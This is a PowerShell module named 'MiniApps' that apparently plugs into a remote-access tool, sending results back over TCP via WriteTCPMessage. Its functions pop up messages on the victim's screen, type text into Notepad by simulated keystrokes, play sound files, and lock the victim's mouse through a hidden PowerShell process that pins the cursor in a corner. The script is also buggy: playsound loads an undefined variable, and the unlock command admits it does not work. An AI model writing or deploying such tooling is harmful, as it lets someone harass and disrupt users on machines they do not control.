#MiniApps
#1.0FIX
#@{"message" = "[box/notepad] displays your message"; "playsound" = "[FileName] plays a wav hidden"; "mouse" = "[lock, unlock]"}
#""

function message ($style, $message, [switch]$slow)
{
	$message = $message.Replace("~", " ")
	
	if ($style -eq "box")
	{
		msg $env:USERNAME $message
		WriteTCPMessage "`nMessage Sent!`n"
	}
	if ($style -eq "notepad")
	{
		
		notepad
		Start-Sleep -Seconds 1
		if ($slow)
		{
			foreach ($letter in $message.ToCharArray())
			{
				(New-Object -ComObject WScript.Shell).SendKeys($letter)
				Start-Sleep -Milliseconds 500
			}
		}
		else { (New-Object -ComObject WScript.Shell).SendKeys($message) }
		WriteTCPMessage "`nMessage Sent!`n"
	}
	if ($style -notin @("box", "notepad")) { WriteTCPMessage "`nInvalid Command!`n" }
	
	Remove-Variable style, message, slow -ErrorAction SilentlyContinue
}

function playsound ($file)
{
	$file = $file.Replace("~", " ")
	$file = (Get-Item $file).FullName
	$player = New-Object System.Media.SoundPlayer
	
	try
	{
		$player.Load($FileName)
		$player.Play()
	}
	catch {WriteTCPMessage "`nUnable to Play file`n"}
	Remove-Variable file, player -ErrorAction SilentlyContinue
}

function mouse ($argument)
{
	Add-Type -AssemblyName System.Windows.Forms
	
	if ($argument -eq "lock")
	{
		$lock = Start-Process powershell.exe { Add-Type -AssemblyName System.Windows.Forms; while ($true) { [System.Windows.Forms.Cursor]::Position = @{ x = 0; y = 0 } } } -WindowStyle Hidden -PassThru
		WriteTCPMessage "`nMouse Locked!`n"
	}
	if ($argument -eq "unlock")
	{
		WriteTCPMessage "Doesnt work no matter what I try D:"
	}
	
	Remove-Variable argument, lock, process -ErrorAction SilentlyContinue
	
}
